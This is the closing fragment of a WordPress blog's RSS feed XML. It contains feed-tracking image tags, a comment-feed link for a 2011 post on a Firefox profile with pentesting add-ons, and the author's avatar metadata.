alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/scoperchiatore.wordpress.com/103/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=scoperchiatore.wordpress.com&amp;blog=13298441&amp;post=103&amp;subd=scoperchiatore&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://scoperchiatore.wordpress.com/2011/10/31/firefox7-profile-with-pentesting-add-ons/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/db09a17b2f81cf798114fd74579afa3d?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">scoperchiatore</media:title>
		</media:content>
	</item>
	</channel>
</rss>
